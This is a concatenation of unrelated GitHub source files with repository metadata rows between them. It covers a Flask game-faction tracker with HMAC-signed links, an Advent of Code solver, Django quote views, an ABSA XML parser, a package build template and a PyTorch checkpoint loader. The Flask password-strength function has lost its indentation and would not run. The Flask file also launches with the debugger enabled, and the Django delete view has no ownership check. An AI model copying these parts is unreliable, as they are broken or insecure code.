            except:
                app.logger.info('error involving AddEnemyForm')
                return render_template('message.html', title='add enemy', message='AddEnemyForm exception reading input', logged_in=True)
        else:
            app.logger.info('AddEnemyForm fails validation')
            return render_template('message.html', title='add enemy', message='AddEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
        # XXX form validation could do better
        # int() here is only a validity probe; the original string is stored
        try:
            actual_integer = int(add_id)
        except ValueError:
            return render_template('message.html', title='add enemy', message='AddEnemyForm accepts only an integer', form=form , logged_in=True)
        if add_id:
            # XXX does not obtain username (fix up in another program) or check whether already in table
            new_enemy = Enemy (tornid = add_id, f_id = faction_sum['fid'], username = '?')
            db.session.add(new_enemy)
            db.session.commit()
        return redirect('/rhubarb/enemy_watch')
    # - - - - - - - POST section
    faction_name = rodb.get_faction_name(f_id)
    return render_template('add_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/define_timerange/<t_to_t>", methods=['GET','POST'])
@app.route("/rhubarb/define_timerange/<t_to_t>", methods=['GET','POST'])
@login_required
def define_timerange(t_to_t):
    """Create a watch time range for the player's faction.

    GET shows the planned start/end with +/- day/hour/minute adjustments;
    POST persists the Timerange and redirects to the enemy watch page.
    """
    form = TimeForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    # sane defaults: from now until this time tomorrow
    tstart = int(time.time())
    tend = tstart + 86400
    # the URL may carry an explicit "<tstart>…<tend>" interval
    re_object = time_interval.match(t_to_t)
    if re_object:
        tstart = int(re_object.group(1))
        tend = int(re_object.group(2))
    if tstart > tend:
        tstart, tend = tend, tstart
    # - - - - - - - POST section
    if request.method == 'POST':
        new_tr = Timerange (tstart=tstart, tend=tend, f_id=f_id)
        db.session.add(new_tr)
        db.session.commit()
        return redirect('/rhubarb/enemy_watch')
    # - - - - - - - POST section
    # variations: plus one day etc (one shared helper instead of 14 near-identical lines)
    start_block = _time_adjustment_block(tstart)
    end_block = _time_adjustment_block(tend)
    faction_name = rodb.get_faction_name(f_id)
    return render_template('define_timerange.html', title='Timerange', form=form, start_block=start_block, end_block=end_block, tstart=tstart, tend=tend, f_id=f_id, faction_name=faction_name)


def _time_adjustment_block(t):
    """Return [label, epoch, readable-UTC] rows for t and its +/- day/hour/minute variants."""
    offsets = [
        ('planned time', 0),
        ('plus 1 day', 86400),
        ('minus 1 day', -86400),
        ('plus 1 hour', 3600),
        ('minus 1 hour', -3600),
        ('plus 1 minute', 60),
        ('minus 1 minute', -60),
    ]
    return [
        [label, t + delta, time.strftime("%A %Y-%m-%d %H:%M", time.gmtime(t + delta))]
        for label, delta in offsets
    ]
#=================================================================================
@app.route("/chain_reports", methods=['GET'])
@app.route("/rhubarb/chain_reports", methods=['GET'])
@login_required
def chain_reports():
    """List the player's faction chains, split into finished and running.

    Each row carries a signed token (HMAC over faction id, chain start and
    issue time) that the chain_details route uses to authenticate the link.
    """
    rodb = read_sqlite.Rodb()
    # player data fetched but not used below — kept for parity with other routes
    player = rodb.get_player_data(current_user.username)
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = faction_sum['fid']
    chains_from_orm = Chains.query.filter_by(f_id = f_id).all()
    # finished and unfinished chains
    chains_fin = []
    chains_unf = []
    for chain in chains_from_orm:
        start_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.tstart))
        chain_len = chain.chain_len
        respect = chain.respect
        if chain.tend:
            end_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.tend))
        else:
            # chain still running: show the time of the last recorded event
            end_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.et))
        # calc correct hmac
        right_now = int(time.time())
        chain_selection_pre = str(f_id) + '-chain-' + str(chain.tstart) + '-' + str(right_now)
        chain_selection = chain_selection_pre.encode("utf-8")
        hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
        stage = [ chain_selection_pre + '-' + hmac_hex, start_text, end_text, chain_len, respect ]
        if chain.tend:
            chains_fin.append(stage)
        else:
            chains_unf.append(stage)
    faction_name = rodb.get_faction_name(f_id)
    return render_template('chain_reports.html', title='Chain reports', chains_fin=chains_fin, chains_unf=chains_unf, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_details(fid_tstart_timestamp_hmac):
    """Show one chain: outline, bonus hits and inactive members.

    The URL token is "<f_id>-chain-<tstart>-<timestamp>-<hmac>"; the HMAC
    authenticates the other fields and the timestamp expires after a day.
    """
    # what chain is this meant to display?
    re_object = chain_token.match(fid_tstart_timestamp_hmac)
    if re_object:
        f_id = re_object.group(1)
        chain_tstart = re_object.group(2)
        timestamp = re_object.group(3)
        given_hmac = re_object.group(4)
    else:
        app.logger.info('in chain_details RE did not match URL')
        return render_template("bad_graph_request.html")
    # recompute and verify the HMAC, then check the link has not expired
    chain_selection = ( str(f_id) + '-chain-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
    right_now = int(time.time())
    if not hmac.compare_digest(hmac_hex, given_hmac):
        app.logger.info('in chain_details HMAC disagreement')
        return render_template("bad_graph_request.html")
    if ((int(timestamp) + 86400) < right_now):
        app.logger.info('in chain_details timestamp is old')
        return render_template("bad_graph_request.html")
    # read from ORM which chain has the right f_id and tstart
    ch = None
    chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
    for chain in chains_from_orm:
        ch = chain
    if not ch:
        return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
    # outline: start, end (or last event if still running), length, respect
    tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
    if ch.tend:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
        over = True
    else:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
        over = False
    outline = [tstart_text, et_text, over, ch.chain_len, ch.respect ]
    # member names keyed by player id; members with actions are removed
    # further below, leaving only the inactive ones
    who_inactive = {}
    our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_mem in our_players:
        who_inactive[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
    # bonus hits; attacker names younger than an hour stay censored
    right_now = int(time.time())
    bonus_list = []
    bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for bonus in bonus_table:
        if (right_now - bonus.et) > 3600:
            # ok to show attacker name
            try:
                stage = [ who_inactive[bonus.att_id] ]
            except KeyError:
                # BUG FIX: was a bare except; only a missing member id is expected here
                stage = [ '?[' + str(bonus.att_id) + ']' ]
        else:
            # hide attacker name
            stage = [ 'CENSORED[000000]' ]
        stage.append(bonus.verb)
        stage.append( bonus.def_name + '[' + str(bonus.def_id) + ']')
        stage.append(bonus.outcome)
        stage.append(bonus.num_respect)
        bonus_list.append(stage)
    bonus_list = sorted(bonus_list, key=lambda one: one[-1])
    # signed link to the per-player scoreboard, default-sorted by respect
    # (use ch.tstart — the selected chain — rather than the loop variable)
    scoreboard_chain_selection_pre = str(f_id) + '-scoreboard-' + str(ch.tstart) + '-' + str(right_now)
    scoreboard_chain_selection = scoreboard_chain_selection_pre.encode("utf-8")
    hmac_hex = hmac.new(hmac_key, scoreboard_chain_selection, digestmod=hashlib.sha1).hexdigest()
    scoreboard_at = scoreboard_chain_selection_pre + '-' + hmac_hex + '-resd'
    # drop members who recorded any action, leaving the inactive ones
    player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_score in player_scores:
        if p_score.player_id in who_inactive:
            if p_score.actions:
                del who_inactive[p_score.player_id]
    rodb = read_sqlite.Rodb()
    faction_name = rodb.get_faction_name(f_id)
    return render_template('chain_details.html', title='Chain details', f_id=f_id, outline=outline, scoreboard_at=scoreboard_at, inactive = who_inactive, bonus = bonus_list, faction_name=faction_name)
#=================================================================================
@app.route("/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_scoreboard(fid_tstart_timestamp_hmac):
    """Per-player scoreboard for one chain, sortable by any column.

    The URL token is "<f_id>-scoreboard-<tstart>-<timestamp>-<hmac><order>",
    where <order> is a 3-letter column key with an optional trailing 'd'
    for descending.  The HMAC covers the fields before the order parameter.
    """
    # what chain is this meant to display?
    re_object = chain_token_o.match(fid_tstart_timestamp_hmac)
    if re_object:
        f_id = re_object.group(1)
        chain_tstart = re_object.group(2)
        timestamp = re_object.group(3)
        given_hmac = re_object.group(4)
        orderparm = re_object.group(5)
    else:
        app.logger.info('in chain_player_summary RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac
    chain_selection = ( str(f_id) + '-scoreboard-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac etc
    right_now = int(time.time())
    if not hmac.compare_digest(hmac_hex, given_hmac):
        app.logger.info('in chain_player_summary HMAC disagreement')
        return render_template("bad_graph_request.html")
    if ((int(timestamp) + 86400) < right_now):
        app.logger.info('in chain_player_summary timestamp is old')
        return redirect('/rhubarb/chain_reports')
    # read from ORM which chain has the right f_id and tstart
    ch = None
    chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
    for chain in chains_from_orm:
        ch = chain
    if not ch:
        return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
    # hyperlinks for ordering the table: strip any existing order suffix,
    # then append each column's own key below
    hyper_seed = [ '/rhubarb/chain_scoreboard/' + fid_tstart_timestamp_hmac.rstrip('abcdefghijklmnopqrstuvwxyz') , 'Sort']
    hyper = []
    for nh in range(12):
        hyper.append( hyper_seed[:] ) # copy makes these separate data items unlike [...] * N
    table_column = {}
    nh = 0
    # 3-letter URL key -> Chain_player_sum attribute name
    table_control = [['act','actions'], ['att','attacked'], ['hos','hospitalized'], ['mug','mugged'], ['res','respect'],
        ['ast','att_stale'], ['los','lost'], ['ate','att_escape'], ['dst','def_stale'], ['def','defend'], ['des','def_escape'], ['arh','perhit']]
    for cols in table_control:
        table_column[cols[0]] = cols[1]
        hyper[nh][0] += cols[0] + 'd' # string addition to each column e.g. 'resd' to the end of the URL
        nh += 1
    # get from ORM data on this chain
    # outline: start, end (or last event if still running)
    tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
    if ch.tend:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
        over = True
    else:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
        over = False
    outline = [tstart_text, et_text, over]
    # members for names, keyed by player id
    who = {}
    our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_mem in our_players:
        who[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
    # bonus hits as (attacker id, respect) pairs, subtracted from averages below
    bonus_list = []
    bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for bonus in bonus_table:
        bonus_list.append([bonus.att_id, bonus.num_respect])
    # get from ORM the chain_player_summary for this chain
    summary = []
    pid2av_respect = {}
    pid2exp = {}
    player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_score in player_scores:
        # average respect scores to be computed here
        total_respect = p_score.respect # made by adding floats then coerced to int
        num_actions = p_score.actions
        # amend by subtracting bonuses so the average reflects normal hits only
        for bonus in bonus_list:
            if bonus[0] == p_score.player_id:
                total_respect -= bonus[1]
                num_actions -= 1
        # respect per action (division)
        res_explanation = ''
        if num_actions >= 2:
            av_respect = total_respect / num_actions
            res_explanation = str(total_respect) + '/' + str(num_actions)
        elif num_actions == 1:
            av_respect = total_respect
        else:
            av_respect = 0.0
        summary.append(p_score)
        # 2 dicts passed along with the object data but not part of it
        pid2av_respect[p_score.player_id] = str(av_respect)
        pid2exp[p_score.player_id] = res_explanation
    # SORTING depends on a parameter passed to the route
    orderparm_s = orderparm[:3] # first 3 chars key the table_column dict
    if (len(orderparm) == 4) and (orderparm[-1] == 'd'):
        reverse = True
        # remove 'd' from the active column's hyperlink so clicking it again
        # toggles to ascending order
        nh = 0
        for cols in table_control:
            if cols[0] == orderparm_s:
                hyper[nh][0] = hyper[nh][0][:-1]
            nh += 1
    else:
        reverse = False
    # need to sort on the right property
    if orderparm_s == 'arh':
        # sorting by AverageRespectPer-Hit, which is outside the summary (array of objects)
        # copy dict into a list that's sorted
        sorted_av_respect_per_hit = sorted(pid2av_respect.items(), key=lambda kv: kv[1], reverse=reverse)
        # make a replacement summary list in the new order
        position = {}
        n = 0
        for x in summary:
            position[x.player_id] = n
            n += 1
        new_summary = []
        for x in sorted_av_respect_per_hit:
            new_summary.append( summary[position[x[0]]] )
        summary = new_summary
    else:
        # sorting by one of the properties in the object
        try:
            summary = sorted(summary, key=lambda one: getattr(one, table_column[orderparm_s]), reverse=reverse)
        except:
            app.logger.info('sort failed - maybe bad orderparm (%s) supplied', orderparm)
    # decorate the data with a rank (n) and readable name (who)
    deco = []
    n=1
    for x in summary:
        if not who[x.player_id]:
            who[x.player_id] = str(x.player_id)
        deco.append( [n, who[x.player_id] , x])
        n += 1
    rodb = read_sqlite.Rodb()
    faction_name = rodb.get_faction_name(f_id)
    return render_template('chain_scoreboard.html', title='Chain scoreboard', f_id=f_id, outline=outline, hyper=hyper, deco=deco, faction_name=faction_name, pid2av_respect=pid2av_respect, pid2exp=pid2exp)
#=================================================================================
def test_strength(pw):
if len(pw) < 8:
return False
digest = hashlib.sha1(bytes(pw, 'utf-8')).hexdigest()
wantsha = Banned_pw.query.filter_by(sha = digest).first()
if wantsha:
# found in table => weak
return False
return True
#=================================================================================
# Run the Flask development server when executed directly (not under WSGI).
# NOTE(review): debug=True enables the interactive Werkzeug debugger —
# confirm this file is never launched this way in production.
if __name__ == "__main__":
    app.run(debug = True)
| realname0000/torn_game_metrics | flask_graph_work/app.py | app.py | py | 84,701 | python | en | code | 0 | github-code | 36 |
28985781241 | from collections import Counter
from typing import Generator, Iterable, Literal, Set
import click
import trimesh.creation
from aoc_2022_kws.cli import main
from aoc_2022_kws.config import config
from trimesh import transformations
class Facet:
    """A single unit face of a cube, identified by axis and corner position.

    Equality and hashing deliberately ignore *vector* (the face's normal
    direction): two adjacent cubes produce the same face with opposite
    vectors, and those must compare equal so shared faces can be counted.
    """

    def __init__(
        self, axis: Literal["x", "y", "z"], x: int, y: int, z: int, vector: int
    ):
        self.axis = axis
        self.x = x
        self.y = y
        self.z = z
        self.vector = vector

    def __repr__(self):
        return "Facet({0}, {1}, {2}, {3} [{4}])".format(
            self.axis, self.x, self.y, self.z, self.vector
        )

    def __eq__(self, other):
        # identity of a face is (axis, x, y, z); vector is ignored on purpose
        return (self.axis, self.x, self.y, self.z) == (
            other.axis,
            other.x,
            other.y,
            other.z,
        )

    def __hash__(self):
        # must stay consistent with __eq__: vector excluded
        return hash((self.axis, self.x, self.y, self.z))
class Cube:
    """A unit cube at integer coordinates.

    Construct from either a single "x,y,z" string (one puzzle-input line)
    or three separate ints.  Equality and hashing use only the coordinates,
    so Cubes can be collected in sets.
    """

    def __init__(self, *args):
        if len(args) == 1:
            # single "x,y,z" string
            self.x, self.y, self.z = [int(i) for i in args[0].split(",")]
        else:
            self.x, self.y, self.z = args

    def __eq__(self, other):
        return self.x == other.x and self.y == other.y and self.z == other.z

    def __hash__(self):
        return hash((self.x, self.y, self.z))

    @property
    def faces(self) -> "Generator[Facet, None, None]":
        """Yield the six unit faces of this cube (two per axis)."""
        yield Facet("x", self.x, self.y, self.z, -1)
        yield Facet("x", self.x + 1, self.y, self.z, 1)
        yield Facet("y", self.x, self.y, self.z, -1)
        yield Facet("y", self.x, self.y + 1, self.z, 1)
        yield Facet("z", self.x, self.y, self.z, -1)
        yield Facet("z", self.x, self.y, self.z + 1, 1)

    @property
    def mesh(self):
        """A unit trimesh box translated to this cube's cell (for visualisation)."""
        move = transformations.translation_matrix(
            (self.x + 0.5, self.y + 0.5, self.z + 0.5)
        )
        return trimesh.creation.box(extents=(1, 1, 1), transform=move)

    def exterior(self, cubes: Set["Cube"]):
        """Return True when at least one neighbour is not in *cubes*.

        BUG FIX: the original returned True or (implicitly) None; now it
        always returns a bool, which is what `if cube.exterior(...)`
        call sites expect.
        """
        return bool(set(self.neighbours) - set(cubes))

    def neighbour(self, x=0, y=0, z=0):
        """The cube offset from this one by (x, y, z)."""
        return Cube(self.x + x, self.y + y, self.z + z)

    @property
    def neighbours(self):
        """The six face-adjacent cubes."""
        return [
            self.neighbour(x=-1),
            self.neighbour(x=1),
            self.neighbour(y=-1),
            self.neighbour(y=1),
            self.neighbour(z=-1),
            self.neighbour(z=1),
        ]
def calculate_bounding_box(cubes: "Iterable[Cube]"):
    """Return (x_min, y_min, z_min, x_max, y_max, z_max) over *cubes*.

    BUG FIX: the original seeded every min/max at 0, so the returned box
    always contained the origin even when all cubes were far from it.
    The box is now derived from the cubes alone; an empty iterable yields
    all zeros (preserving the previous empty-input result).
    """
    cubes = list(cubes)
    if not cubes:
        return 0, 0, 0, 0, 0, 0
    xs = [cube.x for cube in cubes]
    ys = [cube.y for cube in cubes]
    zs = [cube.z for cube in cubes]
    return min(xs), min(ys), min(zs), max(xs), max(ys), max(zs)
@main.command()
@click.option("--sample", "-s", is_flag=True)
@click.option("--save", type=click.Path(dir_okay=False), default=None)
@click.option("--view", is_flag=True)
def day18(sample, save, view):
    """AoC 2022 day 18: surface area of the lava droplet (parts 1 and 2)."""
    if sample:
        input_data = (config.SAMPLE_DIR / "day18.txt").read_text()
    else:
        input_data = (config.USER_DIR / "day18.txt").read_text()
    cubes = [Cube(line) for line in input_data.splitlines()]
    if save or view:
        # build the combined mesh only once for export and/or display
        combined = trimesh.util.concatenate([c.mesh for c in cubes])
        if save:
            combined.export(save)
        if view:
            combined.show()
        return
    # Part 1: faces belonging to exactly one cube form the surface
    all_faces = []
    for c in cubes:
        all_faces.extend(c.faces)
    face_counts = Counter(all_faces)
    covered_faces = set(f for f, count in face_counts.items() if count > 1)
    surface_faces = set(all_faces) - covered_faces
    print("Part 1", len(surface_faces))
    #######################################
    # Part 2                              #
    #######################################
    x_min, y_min, z_min, x_max, y_max, z_max = calculate_bounding_box(cubes)
    print("Bounding box", x_min, y_min, z_min, x_max, y_max, z_max)
    # every empty cell inside the (padded-by-one) bounding box is "void";
    # a set gives O(1) membership instead of scanning the cube list each time
    cube_set = set(cubes)
    void_cubes = set()
    for x in range(x_min - 1, x_max + 2):
        for y in range(y_min - 1, y_max + 2):
            for z in range(z_min - 1, z_max + 2):
                my_cube = Cube(x, y, z)
                if my_cube not in cube_set:
                    void_cubes.add(my_cube)
    print("Void cubes", len(void_cubes))
    # repeatedly peel off void cubes reachable from outside until only the
    # droplet and its fully-enclosed voids remain
    whole_area = cube_set | void_cubes
    print("Before", len(whole_area))
    to_remove: Set | None = None
    while to_remove is None or len(to_remove) > 0:
        if to_remove:
            whole_area -= to_remove
        to_remove = set()
        for my_cube in whole_area & void_cubes:
            if my_cube.exterior(whole_area):
                to_remove.add(my_cube)
    internal_void_cubes = whole_area & void_cubes
    print("After", len(internal_void_cubes))
    # Part 2: the external surface is part 1's surface minus any face that
    # touches an internal void pocket
    internal_faces = set(f for c in internal_void_cubes for f in c.faces)
    external_faces = surface_faces - internal_faces
    print("Part 2", len(external_faces))
| SocialFinanceDigitalLabs/AdventOfCode | solutions/2022/kws/aoc_2022_kws/day_18.py | day_18.py | py | 5,002 | python | en | code | 2 | github-code | 36 |
73659014184 | from django.shortcuts import render, redirect, HttpResponse
from django.contrib import messages
from login.models import User
from .models import Quote
# Create your views here.
def quotes(request):
    """Dashboard: show all quotes, split out the ones this user already liked."""
    # require a logged-in session
    if 'user_id' not in request.session:
        return redirect('/')
    all_users = User.objects.all()
    user = User.objects.get(id=request.session['user_id'])
    # quotes this user has liked (via the users_who_liked relation)
    likes = Quote.objects.filter(users_who_liked__id=user.id)
    total_likes = likes.count()
    # newest first, excluding quotes the user already liked
    quotes = Quote.objects.all().order_by('-id').exclude(id__in=[l.id for l in likes])
    all_quotes = Quote.objects.all()
    context = {
        'all_users': all_users,
        'user': user,
        'quotes': quotes,
        'all_quotes': all_quotes,
        'likes': likes,
        'total_likes': total_likes,
    }
    return render(request, "quotes.html", context)
def addQuote(request):
    """Validate and create a quote posted by the logged-in user.

    On validation errors, flash each message and redirect back; otherwise
    create the Quote with the current user as poster.
    """
    # guard added for consistency with quotes()/addLike(): without it an
    # anonymous request raised KeyError on the session lookup
    if 'user_id' not in request.session:
        return redirect('/')
    user_id = request.session['user_id']  # renamed: 'id' shadowed the builtin
    user = User.objects.get(id=user_id)
    errors = Quote.objects.validator(request.POST, user_id)
    if errors:
        for value in errors.values():
            messages.error(request, value)
    else:
        Quote.objects.create(
            content = request.POST['quote'],
            author = request.POST['author'],
            poster = user,
        )
    return redirect("/quotes")
def addLike(request, quote_id):
    """Record that the logged-in user likes the given quote, then redirect."""
    if 'user_id' not in request.session:
        return redirect('/')
    liker = User.objects.get(id=request.session['user_id'])
    liked_quote = Quote.objects.get(id=quote_id)
    liker.likes.add(liked_quote)
    return redirect('/quotes')
def deleteQuote(request, quote_id):
    """Delete the given quote (logged-in users only).

    SECURITY FIX: the original had no session check, so any anonymous
    request could delete any quote; the guard now matches the other views.
    """
    if 'user_id' not in request.session:
        return redirect('/')
    q2del = Quote.objects.get(id=quote_id)
    q2del.delete()
    return redirect('/quotes')
| everhartC/QuoteDash | quoteApp/views.py | views.py | py | 1,807 | python | en | code | 0 | github-code | 36 |
13859467294 | import xml.etree.ElementTree as ET
import json
# Source XML files (ABSA laptop reviews, per the file names) and the
# "territory" tag used to build output paths.
path_train = "D:/code/prompt-ABSA/dataset/original data/ABSA16_Laptops_Train_SB1_v2.xml"
path_test = 'D:/code/prompt-ABSA/dataset/original data/EN_LAPT_SB1_TEST_.xml'
terr = 'laptops16'
def get_path(territory, data_type):
    """Build the JSON output path for a territory/split pair (e.g. 'train')."""
    return "./dataset/data/{}/{}.json".format(territory, data_type)
def judge(p):
    """Return False when any category in *p* appears with conflicting polarities.

    *p* is a list of {'category': ..., 'polarity': ...} dicts; a sentence is
    acceptable only if each category carries a single consistent polarity.
    """
    polarity_seen = {}
    for opinion in p:
        category = opinion['category']
        polarity = opinion['polarity']
        if category in polarity_seen and polarity_seen[category] != polarity:
            return False
        polarity_seen[category] = polarity
    return True
def extract_data(path):
    """Parse one ABSA XML file into [category_count, categories, sentences].

    Each kept sentence is [text, opinion_dict, ...]; sentences with no
    Opinion elements, or where one category carries multiple polarities,
    are dropped (see judge()).
    """
    tree = ET.parse(path)
    root = tree.getroot()
    data = []
    # extract the data from the xml file
    for review in root:
        for sentences in review:
            for sentence in sentences:
                piece = []
                for t in sentence.iter('text'):
                    piece.append(t.text)
                for o in sentence.iter('Opinion'):
                    d = {'category': o.attrib['category'], 'polarity': o.attrib['polarity']}
                    piece.append(d)
                # drop sentences with no category label, and sentences where a
                # single category carries more than one polarity
                if len(piece) > 1 and judge(piece[1:]):
                    data.append(piece)
    n_category = 0
    category = []
    # tally the distinct categories
    for e in data:
        for i in range(1, len(e)):
            # each opinion dict has exactly the keys category and polarity
            c, s = e[i].values()
            if c not in category:
                n_category += 1
                category.append(c)
    all_data = [n_category, category, data]
    return all_data
# Build train/test datasets, then write them out as JSON.
train_data = extract_data(path_train)
test_data = extract_data(path_test)
# remove from the test set any category that appears in test but not in train
over_list = [elem for elem in test_data[1] if elem not in train_data[1]]
# sentences mentioning an over-represented category are dropped wholesale
move_list = [elem for cate in over_list for elem in test_data[2] for e in elem[1:] if e['category'] == cate]
test_data[2] = [elem for elem in test_data[2] if elem not in move_list]
test_data[1] = [elem for elem in test_data[1] if elem not in over_list]
test_data[0] = len(test_data[1])
print(over_list)
with open(get_path(terr, 'train'), 'w', encoding='utf-8') as f:
    json.dump(train_data, f)
with open(get_path(terr, 'test'), 'w', encoding='utf-8') as f:
    json.dump(test_data, f)
| lazy-cat2233/PBJM | data_from_xml.py | data_from_xml.py | py | 2,285 | python | en | code | 1 | github-code | 36 |
23861578625 | from collections import defaultdict
def is_isogram(string):
dt = defaultdict(int)
for c in string.lower():
dt[c] += 1
for k in dt:
if k.isalpha() and dt[k] > 1:
return False
return True
| stackcats/exercism | python/isogram.py | isogram.py | py | 231 | python | en | code | 0 | github-code | 36 |
7796403598 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : 翻转字符串1.py
# @Author: smx
# @Date : 2019/8/18
# @Desc :
# Read one space-separated line from stdin and print it with each word
# reversed in place.  split(' ') (not split()) is kept deliberately so
# runs of spaces produce empty tokens exactly as before.
strings = input().strip().split(' ')  # split() already returns a list; the list() wrapper was redundant
ans = ' '.join(word[::-1] for word in strings)
print(ans)
| 20130353/Leetcode | target_offer/字符串题/翻转字符串1.py | 翻转字符串1.py | py | 228 | python | en | code | 2 | github-code | 36 |
# cports build template for python-idna.
# FIX: the first line carried stray dataset junk ("955639512 | ") that made
# the file unparseable; the junk is removed, everything else is unchanged.
pkgname = "python-idna"
pkgver = "3.4"
pkgrel = 0
build_style = "python_pep517"
make_check_target = "tests"
hostmakedepends = [
    "python-build",
    "python-installer",
    "python-flit_core",
    "python-wheel",
]
checkdepends = ["python-pytest"]
depends = ["python"]
pkgdesc = "Internationalized Domain Names in Applications (IDNA) for Python"
maintainer = "q66 <q66@chimera-linux.org>"
license = "BSD-3-Clause"
url = "https://github.com/kjd/idna"
source = f"$(PYPI_SITE)/i/idna/idna-{pkgver}.tar.gz"
sha256 = "814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4"
# checks disabled: dep cycle with pytest
options = ["!check"]


def post_install(self):
    # ship the license file with the package
    self.install_license("LICENSE.md")
| chimera-linux/cports | main/python-idna/template.py | template.py | py | 692 | python | en | code | 119 | github-code | 36 |
15871423301 | from pathlib import Path
from typing import Any, Dict
import torch
from tsm import TSM
from tsn import TSN, TRN, MTRN
# Output sizes shared by every model factory below: (verb classes, noun classes)
verb_class_count, noun_class_count = 125, 352
class_count = (verb_class_count, noun_class_count)
def make_tsn(settings):
    """Build a TSN model from a settings dict (see get_model_settings_from_checkpoint)."""
    # Flow inputs stack several frames per snippet; other modalities use one
    snippet_length = settings["flow_length"] if settings["modality"] == "Flow" else 1
    return TSN(
        class_count,
        settings["segment_count"],
        settings["modality"],
        base_model=settings["arch"],
        new_length=snippet_length,
        consensus_type=settings["consensus_type"],
        dropout=settings["dropout"],
    )
def make_trn(settings):
    """Build a TRN or MTRN model, dispatching on settings['model_type']."""
    constructors = {"trn": TRN, "mtrn": MTRN}
    model_type = settings["model_type"]
    if model_type not in constructors:
        raise ValueError(f"Unknown model_type '{model_type}' for TRN")
    # Flow inputs stack several frames per snippet; other modalities use one
    snippet_length = settings["flow_length"] if settings["modality"] == "Flow" else 1
    return constructors[model_type](
        class_count,
        settings["segment_count"],
        settings["modality"],
        base_model=settings["arch"],
        new_length=snippet_length,
        img_feature_dim=settings["img_feature_dim"],
        dropout=settings["dropout"],
    )
def make_tsm(settings):
    """Build a TSM model; a '-nl' suffix on model_type enables non-local blocks."""
    # Flow inputs stack several frames per snippet; other modalities use one
    snippet_length = settings["flow_length"] if settings["modality"] == "Flow" else 1
    return TSM(
        class_count,
        settings["segment_count"],
        settings["modality"],
        base_model=settings["arch"],
        new_length=snippet_length,
        consensus_type="avg",
        dropout=settings["dropout"],
        shift_div=settings["shift_div"],
        shift_place=settings["shift_place"],
        temporal_pool=settings["temporal_pool"],
        non_local=settings["model_type"].endswith("-nl"),
    )
def make_model(settings: Dict[str, Any]) -> torch.nn.Module:
    """Instantiate the model described by *settings* via its type-specific factory."""
    factory_by_type = {
        "tsn": make_tsn,
        "trn": make_trn,
        "mtrn": make_trn,
        "tsm": make_tsm,
        "tsm-nl": make_tsm,
    }
    factory = factory_by_type[settings["model_type"]]
    return factory(settings)
def get_model_settings_from_checkpoint(ckpt: Dict[str, Any]) -> Dict[str, Any]:
    """Collect the settings dict make_model() needs from a checkpoint dict.

    Common keys come straight from the checkpoint; model-type-specific keys
    are added per architecture, and flow_length/dropout come from the saved
    training args object.
    """
    settings = {
        key: ckpt[key] for key in ("model_type", "segment_count", "modality", "arch")
    }
    model_type = ckpt["model_type"]
    if model_type == "tsn":
        settings["consensus_type"] = ckpt["consensus_type"]
    elif model_type in ("tsm", "tsm-nl"):
        for key in ("shift_place", "shift_div", "temporal_pool", "non_local"):
            settings[key] = ckpt[key]
    elif model_type in ("trn", "mtrn"):
        settings["img_feature_dim"] = ckpt["img_feature_dim"]
    # training-time hyperparameters live on the saved argparse namespace
    args = ckpt["args"]
    settings["flow_length"] = args.flow_length
    settings["dropout"] = args.dropout
    return settings
def load_checkpoint(checkpoint_path: Path) -> torch.nn.Module:
    """Rebuild a model from a checkpoint file and load its saved weights.

    NOTE(review): torch.load without map_location restores tensors onto the
    device they were saved from — confirm GPU-saved checkpoints are only
    loaded on machines with a GPU, or pass map_location explicitly.
    """
    ckpt = torch.load(checkpoint_path)
    model_settings = get_model_settings_from_checkpoint(ckpt)
    model = make_model(model_settings)
    model.load_state_dict(ckpt["state_dict"])
    return model
